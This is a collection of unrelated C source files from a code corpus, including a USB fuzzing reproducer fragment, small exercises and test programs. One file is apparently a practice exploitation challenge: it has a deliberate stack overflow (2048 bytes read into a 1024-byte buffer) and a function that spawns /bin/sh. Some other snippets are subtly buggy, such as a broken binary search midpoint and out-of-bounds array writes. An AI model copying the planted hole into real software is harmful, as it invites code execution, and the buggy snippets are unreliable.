*(uint8_t*)0x200000d0 = 3;
*(uint8_t*)0x200000d1 = 1;
*(uint8_t*)0x200000d2 = 9;
*(uint8_t*)0x200000d3 = 2;
*(uint16_t*)0x200000d4 = 0x9f;
*(uint8_t*)0x200000d6 = 3;
*(uint8_t*)0x200000d7 = 1;
*(uint8_t*)0x200000d8 = 0;
*(uint8_t*)0x200000d9 = 0;
*(uint8_t*)0x200000da = 0;
*(uint8_t*)0x200000db = 9;
*(uint8_t*)0x200000dc = 4;
*(uint8_t*)0x200000dd = 0;
*(uint8_t*)0x200000de = 0;
*(uint8_t*)0x200000df = 0;
*(uint8_t*)0x200000e0 = 1;
*(uint8_t*)0x200000e1 = 1;
*(uint8_t*)0x200000e2 = 0;
*(uint8_t*)0x200000e3 = 0;
*(uint8_t*)0x200000e4 = 0xa;
*(uint8_t*)0x200000e5 = 0x24;
*(uint8_t*)0x200000e6 = 1;
*(uint16_t*)0x200000e7 = 0;
*(uint8_t*)0x200000e9 = 0xfd;
*(uint8_t*)0x200000ea = 2;
*(uint8_t*)0x200000eb = 1;
*(uint8_t*)0x200000ec = 2;
*(uint8_t*)0x200000ed = 9;
*(uint8_t*)0x200000ee = 0x24;
*(uint8_t*)0x200000ef = 3;
*(uint8_t*)0x200000f0 = 0;
*(uint16_t*)0x200000f1 = 0x305;
*(uint8_t*)0x200000f3 = 0;
*(uint8_t*)0x200000f4 = 0;
*(uint8_t*)0x200000f5 = 0;
*(uint8_t*)0x200000f6 = 9;
*(uint8_t*)0x200000f7 = 0x24;
*(uint8_t*)0x200000f8 = 3;
*(uint8_t*)0x200000f9 = 0;
*(uint16_t*)0x200000fa = 0;
*(uint8_t*)0x200000fc = 0;
*(uint8_t*)0x200000fd = 0;
*(uint8_t*)0x200000fe = 0;
*(uint8_t*)0x200000ff = 0xd;
*(uint8_t*)0x20000100 = 0x24;
*(uint8_t*)0x20000101 = 7;
*(uint8_t*)0x20000102 = 0;
*(uint16_t*)0x20000103 = 0;
*(uint8_t*)0x20000105 = 0;
memcpy((void*)0x20000106, "\000\000\000\000\000\000", 6);
*(uint8_t*)0x2000010c = 0xb;
*(uint8_t*)0x2000010d = 0x24;
*(uint8_t*)0x2000010e = 7;
*(uint8_t*)0x2000010f = 0;
*(uint16_t*)0x20000110 = 0;
*(uint8_t*)0x20000112 = 5;
memcpy((void*)0x20000113, "\x40\xe5\x13\xe1", 4);
*(uint8_t*)0x20000117 = 9;
*(uint8_t*)0x20000118 = 0x24;
*(uint8_t*)0x20000119 = 3;
*(uint8_t*)0x2000011a = 0;
*(uint16_t*)0x2000011b = 0;
*(uint8_t*)0x2000011d = 0;
*(uint8_t*)0x2000011e = 6;
*(uint8_t*)0x2000011f = 0;
*(uint8_t*)0x20000120 = 0xd;
*(uint8_t*)0x20000121 = 0x24;
*(uint8_t*)0x20000122 = 8;
*(uint8_t*)0x20000123 = 6;
*(uint16_t*)0x20000124 = 0;
*(uint8_t*)0x20000126 = 0;
memcpy((void*)0x20000127, "\xe3\xac\x1d\xf6\xd1\x65", 6);
*(uint8_t*)0x2000012d = 9;
*(uint8_t*)0x2000012e = 4;
*(uint8_t*)0x2000012f = 1;
*(uint8_t*)0x20000130 = 0;
*(uint8_t*)0x20000131 = 0;
*(uint8_t*)0x20000132 = 1;
*(uint8_t*)0x20000133 = 2;
*(uint8_t*)0x20000134 = 0;
*(uint8_t*)0x20000135 = 0;
*(uint8_t*)0x20000136 = 9;
*(uint8_t*)0x20000137 = 4;
*(uint8_t*)0x20000138 = 1;
*(uint8_t*)0x20000139 = 1;
*(uint8_t*)0x2000013a = 1;
*(uint8_t*)0x2000013b = 1;
*(uint8_t*)0x2000013c = 2;
*(uint8_t*)0x2000013d = 0;
*(uint8_t*)0x2000013e = 0;
*(uint8_t*)0x2000013f = 9;
*(uint8_t*)0x20000140 = 5;
*(uint8_t*)0x20000141 = 1;
*(uint8_t*)0x20000142 = 9;
*(uint16_t*)0x20000143 = 0;
*(uint8_t*)0x20000145 = 0;
*(uint8_t*)0x20000146 = 0;
*(uint8_t*)0x20000147 = 0;
*(uint8_t*)0x20000148 = 7;
*(uint8_t*)0x20000149 = 0x25;
*(uint8_t*)0x2000014a = 1;
*(uint8_t*)0x2000014b = 0;
*(uint8_t*)0x2000014c = 0;
*(uint16_t*)0x2000014d = 0;
*(uint8_t*)0x2000014f = 9;
*(uint8_t*)0x20000150 = 4;
*(uint8_t*)0x20000151 = 2;
*(uint8_t*)0x20000152 = 0;
*(uint8_t*)0x20000153 = 0;
*(uint8_t*)0x20000154 = 1;
*(uint8_t*)0x20000155 = 2;
*(uint8_t*)0x20000156 = 0;
*(uint8_t*)0x20000157 = 0;
*(uint8_t*)0x20000158 = 9;
*(uint8_t*)0x20000159 = 4;
*(uint8_t*)0x2000015a = 2;
*(uint8_t*)0x2000015b = 1;
*(uint8_t*)0x2000015c = 1;
*(uint8_t*)0x2000015d = 1;
*(uint8_t*)0x2000015e = 2;
*(uint8_t*)0x2000015f = 0;
*(uint8_t*)0x20000160 = 0;
*(uint8_t*)0x20000161 = 9;
*(uint8_t*)0x20000162 = 5;
*(uint8_t*)0x20000163 = 0x82;
*(uint8_t*)0x20000164 = 9;
*(uint16_t*)0x20000165 = 0;
*(uint8_t*)0x20000167 = 0;
*(uint8_t*)0x20000168 = 0;
*(uint8_t*)0x20000169 = 0;
*(uint8_t*)0x2000016a = 7;
*(uint8_t*)0x2000016b = 0x25;
*(uint8_t*)0x2000016c = 1;
*(uint8_t*)0x2000016d = 0;
*(uint8_t*)0x2000016e = 0;
*(uint16_t*)0x2000016f = 0;
syz_usb_connect(0, 0xb1, 0x200000c0, 0);
}
int main(void)
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
|
the_stack_data/76700989.c | #include <stdio.h>
#include <math.h>
#include <stdlib.h>
int shu (int n,int m)
{
if (m==1) return n;
if (m==n) return 1;
else return shu(n-1,m)+shu(n-1,m-1);
}
int main()
{
int n,m;
scanf("%d%d",&n,&m);
printf("%d",shu (n,m));
return 0;
} |
the_stack_data/18886872.c | #include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <ctype.h>
#define SERV_PORT 8000
int main(int argc, char *argv[])
{
struct sockaddr_in servaddr;
int sockfd, n;
char buf[BUFSIZ];
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
inet_pton(AF_INET, "127.0.0.1", &servaddr.sin_addr);
servaddr.sin_port = htons(SERV_PORT);
while (fgets(buf, BUFSIZ, stdin) != NULL) {
n = sendto(sockfd, buf, strlen(buf), 0, (struct sockaddr *)&servaddr, sizeof(servaddr));
if (n == -1)
perror("sendto error");
n = recvfrom(sockfd, buf, BUFSIZ, 0, NULL, 0); //NULL:不关心对端信息
if (n == -1)
perror("recvfrom error");
write(STDOUT_FILENO, buf, n);
}
close(sockfd);
return 0;
}
|
the_stack_data/378114.c | /**
* @Author ZhangGJ
* @Date 2021/01/16 08:33
*/
#include <stdio.h>
int binsearch(int x, const int v[], int n) {
int low, high, mid;
low = 0;
high = n - 1;
while (low <= high) {
mid = (low + high) < 2;
if (x < v[mid]) {
high = mid - 1;
} else if (x > v[mid]) {
low = mid + 1;
} else {
return mid;
}
}
return -1;
}
|
the_stack_data/138346.c | /*BEGIN_LEGAL
Intel Open Source License
Copyright (c) 2002-2013 Intel Corporation. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer. Redistributions
in binary form must reproduce the above copyright notice, this list of
conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution. Neither the name of
the Intel Corporation nor the names of its contributors may be used to
endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE INTEL OR
ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
END_LEGAL */
/*
* Call the iret assembler stubs.
*/
#include <stdlib.h>
#include <stdio.h>
#include <signal.h>
#ifndef __USE_GNU
# define __USE_GNU
#endif
#include <ucontext.h>
typedef unsigned long UINT64;
typedef signed long INT64;
typedef unsigned int UINT32;
typedef unsigned short UINT16;
extern INT64 iretdTest();
extern INT64 iretqTest();
#if (0)
/* Enable this if you're trying to debug failure of the iret instruction!
* Not enabled all the time becuase the details are OS version dependent,
* and we don't actually need it for the purposes of the test.
*/
static void segvHandler(int sigNo, siginfo_t *si, void * extra)
{
ucontext_t * uctx = (ucontext_t *)extra;
UINT32 * rsp = (UINT32 *)uctx->uc_mcontext.gregs[REG_RSP];
int i;
fprintf (stderr, "SEGV: RIP %p, fault address 0x%lx, RSP %p\n",
uctx->uc_mcontext.gregs[REG_RIP],
si->si_addr, rsp);
for (i=0; i<3; i++)
{
fprintf (stderr, "%p: %08x, %08x, %08x, %08x\n", rsp, rsp[0], rsp[1], rsp[2], rsp[3]);
rsp += 4;
}
exit(-1);
}
static UINT64 altStack[16384];
static void registerSegvHandler()
{
struct sigaction sa;
stack_t sigStack;
sigStack.ss_flags = 0;
sigStack.ss_sp = &altStack[0];
sigStack.ss_size = sizeof(altStack);
if (sigaltstack(&sigStack, 0))
{
fprintf (stderr, "sigaltsack failed\n");
}
else
{
fprintf (stderr, "Altstack established\n");
}
if (sigaction (SIGSEGV, 0, &sa))
{
fprintf(stderr, "sigaction read failed\n");
}
else
{
fprintf (stderr, "sigaction read OK\n");
}
sa.sa_sigaction = segvHandler;
sa.sa_flags = SA_SIGINFO | SA_ONSTACK;
if (sigaction (SIGSEGV, &sa, 0))
{
fprintf(stderr, "sigaction write failed\n");
}
else
{
fprintf (stderr, "sigaction write OK\n");
}
}
#else
# define registerSegvHandler() ((void)0)
#endif
int main (int argc, char ** argv)
{
INT64 result;
int ok = 0;
int tests = 0;
registerSegvHandler();
tests++;
fprintf(stderr, "Calling iretq\n");
result = iretqTest();
fprintf(stderr, "iretq result = %d %s\n", result, result == -2 ? "OK" : "***ERROR***");
ok += (result == -2);
#if (0)
/* Don't try iretd since I havent' been able to find a coherent description of
* what it is supposed to do.
*/
tests++;
fprintf(stderr, "Calling iretd\n");
result = iretdTest();
fprintf(stderr, "iretd result = %d %s\n", result, result == -1 ? "OK" : "***ERROR***");
ok += (result == -1);
#endif
return (ok == tests) ? 0 : -1;
}
|
the_stack_data/193891931.c | #include <stdio.h>
int main()
{
float A[4][4];
int i, j;
for (i=0; i<4; i++){
for (j=0; j<4; j++){
printf("Digite A[%d][%d]: ", i, j); scanf("%f", &A[i][j]);
}
}
for (i=0; i<4; i++){
for (j=0; j<4; j++){
if (i == j)
printf("A[%d][%d]: %f \n", i, j, A[i][j]);
}
}
system("pause");
return 0;
} |
the_stack_data/82949201.c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
time_t from_iso_date(const char* datetime)
{
struct tm t;
int success = sscanf(datetime, "%d-%d-%dT%d:%dZ", /* */
&t.tm_year, &t.tm_mon, &t.tm_mday, &t.tm_hour, &t.tm_min);
if (success != 5) {
return 0;
}
/* compensate expected ranges */
t.tm_year = t.tm_year - 1900;
t.tm_mon = t.tm_mon - 1;
t.tm_sec = 0;
t.tm_wday = 0;
t.tm_yday = 0;
t.tm_isdst = 0;
time_t local_time = mktime(&t);
time_t utc_time = local_time - timezone;
return utc_time;
}
const char* make_iso_date_str(const time_t date)
{
struct tm utc = *gmtime(&date);
/* compensate expected ranges */
utc.tm_year = utc.tm_year + 1900;
utc.tm_mon = utc.tm_mon + 1;
char* s = (char*)malloc(sizeof(char[17 + 1]));
sprintf(s, "%04d-%02d-%02dT%02d:%02dZ", /* */
utc.tm_year, utc.tm_mon, utc.tm_mday, utc.tm_hour, utc.tm_min);
return s;
}
|
the_stack_data/1026928.c | // enumerator_sizeof.c
// an example from the CIL docs, this is an enumeration
// where one of the enumerators is a sizeof expression
#include <assert.h> // assert
enum {
FIVE = 5,
SIX, SEVEN,
FOUR = FIVE - 1,
EIGHT = sizeof(double)
};
int main()
{
// store the enumerator values in an array, so the
// optimizer won't get too clever
int n[10], i;
n[4] = FOUR;
n[5] = FIVE;
n[6] = SIX;
n[7] = SEVEN;
n[8] = EIGHT;
for (i=4; i<=8; i++) {
assert(i == n[i]);
}
return 0;
}
|
the_stack_data/16239.c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define MAX 100
int set[MAX];
void sort(int n) {
int inner, outer;
int valueToInsert;
int h = 1;
while (h <= n / 3) h = h * 3 + 1;
while (h > 0) {
for (outer = h; outer < n; outer++) {
valueToInsert = set[outer];
inner = outer;
while (inner > h - 1 && set[inner - h] >= valueToInsert) {
set[inner] = set[inner - h];
inner -= h;
}
set[inner] = valueToInsert;
}
h = (h - 1) / 3;
}
}
void dump(int set[], int n) {
for (int i = 0; i <= n; i++) printf("\t%2d|", set[i]);
printf("\n");
}
int main() {
printf("Enter number of elements (MAX %d): ", MAX);
int n;
scanf("%d", &n);
srand(time(NULL));
for (int i = 0; i < n; i++) set[i] = rand() % 50;
printf("Unsorted array:\t");
dump(set, n - 1);
printf("sorting...");
sort(n);
printf("\rSorted array:\t");
dump(set, n - 1);
while (1);
return 0;
}
|
the_stack_data/150904.c | /*
测试参数传递。
使用make param来构建。
使用./param来运行。
使用gcc -S param.c -o param.s来生成汇编代码。
*/
void println(double a);
// double foo(double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, double p9, double p10){
// double x1 = p1*p2;
// double x2 = p3*p4;
// return x1 + x2 + p5*p6 + p7*p8 + p9+ p10;
// }
//为避免过程间优化,只提供一个函数声明
double foo(double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, double p9, double p10);
// double bar(double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, double p9, double p10){
// double x1 = p1*p2;
// double x2 = p3*p4;
// double x3 = foo(x1,x2,p3,p4,p5,6,7,8,9,10);
// double x4 = foo(x1,x2,x3,p4,p5,p6,p7,p8,p9,p10);
// return x4+p10;
// }
double bar(){
return foo(1, 2, 3, 4, 5, 6.1, 7.2, 8.3, 9.4, 10.5);
}
double bar1(){
return foo(12, 21, 23, 34, 5, 6.1, 7.2, 8.3, 9.4, 10.5);
}
// int main(){
// double c = a*b + foo(1,2,3,4,5,6,9,10,11,12);
// println(c);
// return 0;
// }
|
the_stack_data/247018448.c | #include <stdio.h>
void test_array_index() {
int i = 0;
int arr[3] = {0};
for(; i<=3; i++){
arr[i] = 0;
printf("hello world\n");
}
}
/* 数组下标可以为负数 */
void test2() {
double a1[4] = {1.2, 2.4, 3.6, 4.8};
a1[-1] = 20.5;
printf("a1[-1] = %f, addr = %p\n", a1[-1], &a1[-1]);
printf("al addr = %p\n", a1);
}
int main(int argc, char* argv[]){
//test_array_index();
test2();
return 0;
}
|
the_stack_data/3369.c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_strjoin.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: lteresia <[email protected]> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2021/09/09 15:14:47 by lteresia #+# #+# */
/* Updated: 2021/09/09 15:14:48 by lteresia ### ########.fr */
/* */
/* ************************************************************************** */
#include <stdlib.h>
int ft_strlen(char *str)
{
int i;
i = 0;
while (*(str + i) != '\0')
i++;
return (i);
}
char *ft_strcat(char *dest, char *src)
{
int i;
int dest_len;
i = 0;
dest_len = ft_strlen(dest);
while (src[i] != '\0')
{
dest[dest_len + i] = src[i];
i++;
}
dest[dest_len + i] = '\0';
return (dest);
}
int ft_strcmp(char *s1, char *s2)
{
while (*s1 && (*s1 == *s2))
{
s1++;
s2++;
}
return (*s1 - *s2);
}
int ft_max(int n, int m)
{
if (n > m)
return (n);
else
return (m);
}
char *ft_strjoin(int size, char **strs, char *sep)
{
int i;
int dest_len;
char *dest;
i = 0;
dest_len = 0;
while (i < size)
dest_len += ft_strlen(strs[i++]);
dest_len += ft_max(size - 1, 0) * ft_strlen(sep);
dest = (char *) malloc(sizeof(char) * (dest_len + 1));
if (dest == NULL)
return (NULL);
dest[0] = '\0';
i = 0;
while (i < size)
{
ft_strcat(dest, strs[i]);
if (i != size - 1)
ft_strcat(dest, sep);
i++;
}
return (dest);
}
|
the_stack_data/174099.c | #include <stdio.h>
#include <unistd.h>
int main(int argc, char const *argv[])
{
// ejemplo para ver como funciona el paso de parámetros
printf("numero argumentos: %d\n",argc-1);
printf("Argumento 1: %s\n",argv[1]);
printf("Argumento 2: %s\n",argv[2]);
// sol al problema
printf("Longitud máxima de argumentos: %li.\n",sysconf(_SC_ARG_MAX));
printf("Número máximo de hijos: %li.\n",sysconf(_SC_CHILD_MAX));
printf("Número máximo de ficheros: %li.\n",sysconf(_SC_OPEN_MAX));
return 0;
} |
the_stack_data/57951246.c | // This file is part of CPAchecker,
// a tool for configurable software verification:
// https://cpachecker.sosy-lab.org
//
// SPDX-FileCopyrightText: 2007-2020 Dirk Beyer <https://www.sosy-lab.org>
//
// SPDX-License-Identifier: Apache-2.0
#include <stdlib.h>
typedef struct node {
struct node* next;
struct node* prev;
int data;
} *DLL;
DLL node_create(int data) {
DLL temp = (DLL) malloc(sizeof(struct node));
temp->next = NULL;
temp->prev = NULL;
temp->data = data;
return temp;
}
void dll_destroy(DLL head) {
while(head) {
DLL p = head->next;
free(head);
head = p;
}
}
int main() {
const int data = 5;
DLL a = node_create(data);
DLL b = node_create(data);
a->next = b;
b->prev = a;
b = NULL;
dll_destroy(a);
return 0;
}
|
the_stack_data/152457.c | #include <unistd.h>
void mx_printchar(char c);
int mx_strlen(const char *s);
void mx_printstr(const char *s);
int mx_strcmp(const char *s1, const char *s2);
int main(int argc, char const *argv[]) {
const char *temp;
if (argc < 2)
return 0;
for (int i = 1; i < argc; ++i) {
for (int j = i; j < argc; ++j) {
if (mx_strcmp(argv[i], argv[j]) > 0) {
temp = argv[j];
argv[j] = argv[i];
argv[i] = temp;
}
}
}
for (int i = 1; i < argc; ++i) {
mx_printstr(argv[i]);
mx_printchar('\n');
}
return 0;
}
|
the_stack_data/175311.c | #include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main()
{
int x[200],y[200],xx[200],yy[200],n,k,dif,dif1,i,max;
char tip[200][5];
scanf("%d%d %s",&x[0],&y[0],tip[0]);
scanf("%d",&n);
for(i=1;i<n+1;i++)
{
scanf("%d %d %s",&x[i],&y[i],tip[i]);
}
k=0;
max=10000;
for(i=1;i<n;i++)
{
if(strcmp(tip[0],tip[i])==0)
{
dif=abs(x[i]-x[0]);
dif1=abs(y[i]-y[0]);
if(dif+dif1<max)
{
max=dif+dif1;
}
}
}
for(i=1;i<n;i++)
{
if(strcmp(tip[0],tip[i])==0)
{
dif=x[i]-x[0];
if(dif<0)
{
dif=dif*-1;
}
dif1=y[i]-y[0];
if(dif1<0)
{
dif1=dif1*-1;
}
if(dif+dif1==max)
{
yy[k]=y[i];
xx[k]=x[i];
k++;
}
}
}
if(k==0)
{
printf("Nenhum\n");
}
else
{
printf("%d %d %s %d\n",xx[0],yy[0],tip[0],(xx[0]-x[0])*(xx[0]-x[0]) + (yy[0]-y[0])*(yy[0]-y[0]));
}
return 0;
}
|
the_stack_data/54824736.c | #include <stdio.h>
#include <stdlib.h> /* exit */
int main(int argc, char *argv[])
{
FILE *fp;
int i;
char c;
if (argc < 2)
{
fprintf(stderr, "USAGE: fcat filename filename2 ...\n");
exit(EXIT_FAILURE);
}
for (i = 1; i < argc; i++)
{
if ((fp = fopen(argv[i], "r")) == NULL)
{
fprintf(stderr, "Error: file %s cannot be opened\n", argv[i]);
exit(EXIT_FAILURE);
} else {
while ((c = getc(fp)) != EOF)
putchar(c);
fclose(fp);
}
}
exit(EXIT_SUCCESS);
}
|
the_stack_data/193893462.c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_strdup.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: akharrou <[email protected]> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2018/10/30 22:14:06 by akharrou #+# #+# */
/* Updated: 2018/11/02 11:35:47 by akharrou ### ########.fr */
/* */
/* ************************************************************************** */
#include <stdlib.h>
char *ft_strdup(char *src)
{
int i;
char *dest;
i = 0;
while (src[i])
i++;
if (!(dest = malloc(i + 1)))
return (NULL);
i = 0;
while (src[i])
{
dest[i] = src[i];
i++;
}
dest[i] = '\0';
return (dest);
}
|
the_stack_data/44322.c | /*
ID:lindong6
PROG:sprime
LANG:C
*/
#include <stdio.h>
#include <math.h>
void read(void);
int N;
void dfs(int pos, int now);
int isprime(int x);
int main(void)
{
read();
dfs(0, 0);
return 0;
}
void dfs(int pos, int now)
{
if (isprime(now)) {
if (pos == N) {
printf("%d\n", now);
return;
}
} else if (now == 0) {
;
} else {
return ;
}
now *= 10;
dfs(pos + 1, now + 1);
dfs(pos + 1, now + 2);
dfs(pos + 1, now + 3);
dfs(pos + 1, now + 5);
dfs(pos + 1, now + 7);
dfs(pos + 1, now + 9);
}
int isprime(int now)
{
int limit = sqrt(now) + 2;
register int i;
if (now == 0 || now == 1)
return 0;
if (now == 2)
return 1;
for (i = 2; i < limit; ++i)
if (now % i == 0)
return 0;
return 1;
}
void read(void)
{
scanf("%d", &N);
}
|
the_stack_data/63464.c | #include <stdio.h>
#include <string.h>
#include <stdlib.h>
// TODO: REMOVE THIS FUNCTION
void execute_bash()
{
system("/bin/sh");
}
void exploitMe(FILE *f)
{
char buf[1024];
fread(buf, 1, 2048, f);
puts(buf);
}
void main(int argc, char **argv)
{
if (argc != 2)
{
puts("usage: exploit100 [filename]");
return;
}
FILE *f = fopen(argv[1], "rb");
if (f != NULL){
exploitMe(f);
fclose(f);
}
}
|
the_stack_data/83122.c | int testStaticLibRequiredPrivate(void)
{
return 0;
}
|
the_stack_data/115764502.c | #include<stdio.h>
int function(int*p);
int n;
int main()
{
int diff,a[100],i;
printf("enter elements");
scanf("%d",&n);
for(i=0;i<n;i++)
scanf("%d",&a[i]);
diff=function(a);
printf("%d",diff);
}
int function(int *p)
{
int lar,low,i,diff;
lar=low=*(p);
for(i=1;i<n;i++)
{
if(*(p+i)>lar)
lar=*(p+i);
if(*(p+i)<low)
low=*(p+i);
}
printf("%d\n%d",lar,low);
diff=lar-low;
return(diff);
}
|
the_stack_data/23976.c | /* PR tree-optimizations/40351 */
struct IO_APIC_route_entry {
unsigned int vector : 8;
unsigned int delivery_mode : 1;
unsigned int mask : 1;
unsigned int __reserved_2 : 15;
unsigned int __reserved_3 : 8;
} __attribute__ ((packed));
union entry_union {
struct {
unsigned int w1, w2;
};
struct IO_APIC_route_entry entry;
};
unsigned int io_apic_read(void);
struct IO_APIC_route_entry ioapic_read_entry(void)
{
union entry_union eu;
eu.w1 = io_apic_read();
return eu.entry;
}
|
the_stack_data/1013267.c | #include<stdio.h>
int main(){
int k, n, h, m;
h = 0;
m = 0;
scanf("%d%d", &k, &n);
if(k < 0 || k > 3 || n > 1000000000 || n < 0){
printf("Invalid input\n");
}
else{
n >>= (8 * k);
if(n & 1){m++;printf("1");}
else{h++;printf("0");}
n >>= 1;
if(n & 1){m++;printf("1");}
else{h++;printf("0");}
n >>= 1;
if(n & 1){m++;printf("1");}
else{h++;printf("0");}
n >>= 1;
if(n & 1){m++;printf("1");}
else{h++;printf("0");}
n >>= 1;
if(n & 1){m++;printf("1");}
else{h++;printf("0");}
n >>= 1;
if(n & 1){m++;printf("1");}
else{h++;printf("0");}
n >>= 1;
if(n & 1){m++;printf("1");}
else{h++;printf("0");}
n >>= 1;
if(n & 1){m++;printf("1");}
else{h++;printf("0");}
n >>= 1;
printf("\n%d\n%d\n", h, m);
}
return 0;
}
|
the_stack_data/504021.c | int EXPRESSION(int);
int nondet_int();
int main()
{
int in=nondet_int(), out;
out=EXPRESSION(in);
__CPROVER_assert(out==in, "");
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.